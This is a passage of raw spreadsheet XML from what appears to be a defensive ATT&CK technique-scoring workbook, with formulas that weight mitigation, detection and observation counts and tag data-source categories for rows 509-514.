        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K509" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L509" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M509" s="37">
        <v>0</v>
      </c>
      <c r="N509" s="56">
        <v>0</v>
      </c>
      <c r="O509" s="56">
        <v>0</v>
      </c>
      <c r="P509" s="56">
        <v>0</v>
      </c>
      <c r="Q509" s="56">
        <v>0</v>
      </c>
      <c r="R509" s="57" t="s">
        <v>1773</v>
      </c>
      <c r="S509" s="57">
        <v>8</v>
      </c>
      <c r="T509" s="57" t="s">
        <v>1774</v>
      </c>
      <c r="U509" s="57">
        <v>11</v>
      </c>
      <c r="V509" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.18095261904761906</v>
      </c>
      <c r="W509" s="37">
        <v>19</v>
      </c>
      <c r="X509" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Y509" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Z509" s="37">
        <v>0</v>
      </c>
      <c r="AA509" s="37">
        <v>0</v>
      </c>
      <c r="AB509" s="37">
        <v>0</v>
      </c>
      <c r="AC509" s="37"/>
      <c r="AD509" s="50" t="s">
        <v>1775</v>
      </c>
      <c r="AE509" s="37" t="str" cm="1">
        <f t="array" ref="AE509">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD509)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF509" s="37">
        <v>505</v>
      </c>
      <c r="AG509" s="37" t="str" cm="1">
        <f t="array" ref="AG509">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD509)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH509" s="37">
        <v>505</v>
      </c>
      <c r="AI509" s="37" t="str" cm="1">
        <f t="array" ref="AI509">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD509)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ509" s="37">
        <v>505</v>
      </c>
      <c r="AK509" s="37" t="str" cm="1">
        <f t="array" ref="AK509">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD509)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL509" s="37">
        <v>505</v>
      </c>
      <c r="AM509" s="37" t="str" cm="1">
        <f t="array" ref="AM509">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD509)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN509" s="37">
        <v>0</v>
      </c>
      <c r="AO509" s="37">
        <v>0</v>
      </c>
      <c r="AP509" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ509" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>189.26841436507937</v>
      </c>
      <c r="AR509" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS509" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT509" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU50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10" spans="1:47" ht="34">
      <c r="A510" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B510" s="37">
        <f t="shared" si="7"/>
        <v>568.92905357142854</v>
      </c>
      <c r="C510" s="37" t="s">
        <v>1776</v>
      </c>
      <c r="D510" s="50" t="s">
        <v>1772</v>
      </c>
      <c r="E510" s="37" t="s">
        <v>1777</v>
      </c>
      <c r="F510" s="37">
        <v>1</v>
      </c>
      <c r="G510" s="37">
        <v>1</v>
      </c>
      <c r="H510" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I510" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J510" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K510" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L510" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M510" s="37">
        <v>0</v>
      </c>
      <c r="N510" s="56">
        <v>0</v>
      </c>
      <c r="O510" s="56">
        <v>0</v>
      </c>
      <c r="P510" s="56">
        <v>0</v>
      </c>
      <c r="Q510" s="56">
        <v>0</v>
      </c>
      <c r="R510" s="57" t="s">
        <v>1773</v>
      </c>
      <c r="S510" s="57">
        <v>8</v>
      </c>
      <c r="T510" s="57" t="s">
        <v>1774</v>
      </c>
      <c r="U510" s="57">
        <v>11</v>
      </c>
      <c r="V510" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.18095261904761906</v>
      </c>
      <c r="W510" s="37">
        <v>19</v>
      </c>
      <c r="X510" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Y510" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Z510" s="37">
        <v>0</v>
      </c>
      <c r="AA510" s="37">
        <v>0</v>
      </c>
      <c r="AB510" s="37">
        <v>0</v>
      </c>
      <c r="AC510" s="37"/>
      <c r="AD510" s="50" t="s">
        <v>1778</v>
      </c>
      <c r="AE510" s="37" t="str" cm="1">
        <f t="array" ref="AE510">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD510)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF510" s="37">
        <v>506</v>
      </c>
      <c r="AG510" s="37" t="str" cm="1">
        <f t="array" ref="AG510">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD510)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH510" s="37">
        <v>506</v>
      </c>
      <c r="AI510" s="37" t="str" cm="1">
        <f t="array" ref="AI510">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD510)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ510" s="37">
        <v>506</v>
      </c>
      <c r="AK510" s="37" t="str" cm="1">
        <f t="array" ref="AK510">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD510)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL510" s="37">
        <v>506</v>
      </c>
      <c r="AM510" s="37" t="str" cm="1">
        <f t="array" ref="AM510">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD510)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN510" s="37">
        <v>0</v>
      </c>
      <c r="AO510" s="37">
        <v>0</v>
      </c>
      <c r="AP510" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ510" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>189.64301785714284</v>
      </c>
      <c r="AR510" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS510" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT510" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU51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11" spans="1:47" ht="34">
      <c r="A511" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B511" s="37">
        <f t="shared" si="7"/>
        <v>579.71476880952389</v>
      </c>
      <c r="C511" s="37" t="s">
        <v>1779</v>
      </c>
      <c r="D511" s="50" t="s">
        <v>1772</v>
      </c>
      <c r="E511" s="37" t="s">
        <v>1780</v>
      </c>
      <c r="F511" s="37">
        <v>1</v>
      </c>
      <c r="G511" s="37">
        <v>1</v>
      </c>
      <c r="H511" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I511" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J511" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K511" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L511" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M511" s="37">
        <v>0</v>
      </c>
      <c r="N511" s="56">
        <v>0</v>
      </c>
      <c r="O511" s="56">
        <v>1</v>
      </c>
      <c r="P511" s="56">
        <v>0</v>
      </c>
      <c r="Q511" s="56">
        <v>0</v>
      </c>
      <c r="R511" s="57" t="s">
        <v>1773</v>
      </c>
      <c r="S511" s="57">
        <v>8</v>
      </c>
      <c r="T511" s="57" t="s">
        <v>1774</v>
      </c>
      <c r="U511" s="57">
        <v>11</v>
      </c>
      <c r="V511" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.18571452380952383</v>
      </c>
      <c r="W511" s="37">
        <v>19</v>
      </c>
      <c r="X511" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Y511" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Z511" s="37">
        <v>1</v>
      </c>
      <c r="AA511" s="37">
        <v>0.01</v>
      </c>
      <c r="AB511" s="37">
        <v>0.01</v>
      </c>
      <c r="AC511" s="37"/>
      <c r="AD511" s="50" t="s">
        <v>1155</v>
      </c>
      <c r="AE511" s="37" t="str" cm="1">
        <f t="array" ref="AE511">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD511)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF511" s="37">
        <v>507</v>
      </c>
      <c r="AG511" s="37" t="str" cm="1">
        <f t="array" ref="AG511">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD511)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH511" s="37">
        <v>507</v>
      </c>
      <c r="AI511" s="37" t="str" cm="1">
        <f t="array" ref="AI511">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD511)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ511" s="37">
        <v>507</v>
      </c>
      <c r="AK511" s="37" t="str" cm="1">
        <f t="array" ref="AK511">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD511)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL511" s="37">
        <v>507</v>
      </c>
      <c r="AM511" s="37" t="str" cm="1">
        <f t="array" ref="AM511">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD511)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN511" s="37">
        <v>0</v>
      </c>
      <c r="AO511" s="37">
        <v>0</v>
      </c>
      <c r="AP511" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ511" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>193.23825626984129</v>
      </c>
      <c r="AR511" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS511" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT511" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU51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12" spans="1:47" ht="34">
      <c r="A512" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B512" s="37">
        <f t="shared" si="7"/>
        <v>580.8576269047619</v>
      </c>
      <c r="C512" s="37" t="s">
        <v>1781</v>
      </c>
      <c r="D512" s="50" t="s">
        <v>1772</v>
      </c>
      <c r="E512" s="37" t="s">
        <v>1782</v>
      </c>
      <c r="F512" s="37">
        <v>1</v>
      </c>
      <c r="G512" s="37">
        <v>1</v>
      </c>
      <c r="H512" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I512" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J512" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K512" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L512" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M512" s="37">
        <v>0</v>
      </c>
      <c r="N512" s="56">
        <v>0</v>
      </c>
      <c r="O512" s="56">
        <v>0</v>
      </c>
      <c r="P512" s="56">
        <v>1</v>
      </c>
      <c r="Q512" s="56">
        <v>0</v>
      </c>
      <c r="R512" s="57" t="s">
        <v>1773</v>
      </c>
      <c r="S512" s="57">
        <v>8</v>
      </c>
      <c r="T512" s="57" t="s">
        <v>1774</v>
      </c>
      <c r="U512" s="57">
        <v>11</v>
      </c>
      <c r="V512" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.18571452380952383</v>
      </c>
      <c r="W512" s="37">
        <v>19</v>
      </c>
      <c r="X512" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Y512" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Z512" s="37">
        <v>1</v>
      </c>
      <c r="AA512" s="37">
        <v>0.01</v>
      </c>
      <c r="AB512" s="37">
        <v>0.01</v>
      </c>
      <c r="AC512" s="37"/>
      <c r="AD512" s="50" t="s">
        <v>1783</v>
      </c>
      <c r="AE512" s="37" t="str" cm="1">
        <f t="array" ref="AE512">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD512)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF512" s="37">
        <v>508</v>
      </c>
      <c r="AG512" s="37" t="str" cm="1">
        <f t="array" ref="AG512">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD512)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH512" s="37">
        <v>508</v>
      </c>
      <c r="AI512" s="37" t="str" cm="1">
        <f t="array" ref="AI512">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD512)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ512" s="37">
        <v>508</v>
      </c>
      <c r="AK512" s="37" t="str" cm="1">
        <f t="array" ref="AK512">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD512)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL512" s="37">
        <v>508</v>
      </c>
      <c r="AM512" s="37" t="str" cm="1">
        <f t="array" ref="AM512">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD512)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN512" s="37">
        <v>0</v>
      </c>
      <c r="AO512" s="37">
        <v>0</v>
      </c>
      <c r="AP512" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ512" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>193.61920896825396</v>
      </c>
      <c r="AR512" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS512" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT512" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU51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13" spans="1:47" ht="51">
      <c r="A513" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B513" s="37">
        <f t="shared" si="7"/>
        <v>223.1</v>
      </c>
      <c r="C513" s="37" t="s">
        <v>1784</v>
      </c>
      <c r="D513" s="50" t="s">
        <v>1772</v>
      </c>
      <c r="E513" s="37" t="s">
        <v>1785</v>
      </c>
      <c r="F513" s="37">
        <v>1</v>
      </c>
      <c r="G513" s="37">
        <v>1</v>
      </c>
      <c r="H513" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I513" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J513" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K513" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L513" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M513" s="37">
        <v>0</v>
      </c>
      <c r="N513" s="56">
        <v>0</v>
      </c>
      <c r="O513" s="56">
        <v>0</v>
      </c>
      <c r="P513" s="56">
        <v>0</v>
      </c>
      <c r="Q513" s="56">
        <v>2</v>
      </c>
      <c r="R513" s="57"/>
      <c r="S513" s="57">
        <v>0</v>
      </c>
      <c r="T513" s="57"/>
      <c r="U513" s="57">
        <v>0</v>
      </c>
      <c r="V513" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W513" s="37">
        <v>0</v>
      </c>
      <c r="X513" s="37">
        <v>0</v>
      </c>
      <c r="Y513" s="37">
        <v>0</v>
      </c>
      <c r="Z513" s="37">
        <v>2</v>
      </c>
      <c r="AA513" s="37">
        <v>0.02</v>
      </c>
      <c r="AB513" s="37">
        <v>0.02</v>
      </c>
      <c r="AC513" s="37"/>
      <c r="AD513" s="50" t="s">
        <v>1786</v>
      </c>
      <c r="AE513" s="37" t="str" cm="1">
        <f t="array" ref="AE513">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD513)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF513" s="37">
        <v>509</v>
      </c>
      <c r="AG513" s="37" t="str" cm="1">
        <f t="array" ref="AG513">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD513)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH513" s="37">
        <v>509</v>
      </c>
      <c r="AI513" s="37" t="str" cm="1">
        <f t="array" ref="AI513">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD513)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ513" s="37">
        <v>509</v>
      </c>
      <c r="AK513" s="37" t="str" cm="1">
        <f t="array" ref="AK513">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD513)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL513" s="37">
        <v>509</v>
      </c>
      <c r="AM513" s="37" t="str" cm="1">
        <f t="array" ref="AM513">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD513)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN513" s="37">
        <v>0</v>
      </c>
      <c r="AO513" s="37">
        <v>0</v>
      </c>
      <c r="AP513" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ513" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>74.36666666666666</v>
      </c>
      <c r="AR513" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS513" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT513" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU51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14" spans="1:47" ht="34">
      <c r="A514" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B514" s="37">
        <f t="shared" si="7"/>
        <v>204.10000000000002</v>
      </c>
      <c r="C514" s="37" t="s">
        <v>3816</v>
      </c>
      <c r="D514" s="50" t="s">
        <v>1772</v>
      </c>
      <c r="E514" s="37" t="s">
        <v>3817</v>
      </c>
      <c r="F514" s="37">
        <v>1</v>
      </c>
      <c r="G514" s="37">
        <v>1</v>
      </c>
      <c r="H514" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I514" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J514" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K514" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L514" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M514" s="37">
        <v>0</v>
      </c>
      <c r="N514" s="56">
        <v>0</v>
      </c>
      <c r="O514" s="56">
        <v>0</v>
      </c>
      <c r="P514" s="56">
        <v>0</v>
      </c>
      <c r="Q514" s="56">
        <v>0</v>
      </c>
      <c r="R514" s="57"/>
      <c r="S514" s="57"/>
      <c r="T514" s="57"/>
      <c r="U514" s="57"/>
      <c r="V514" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W514" s="37"/>
      <c r="X514" s="37"/>
      <c r="Y514" s="37"/>
      <c r="Z514" s="37"/>
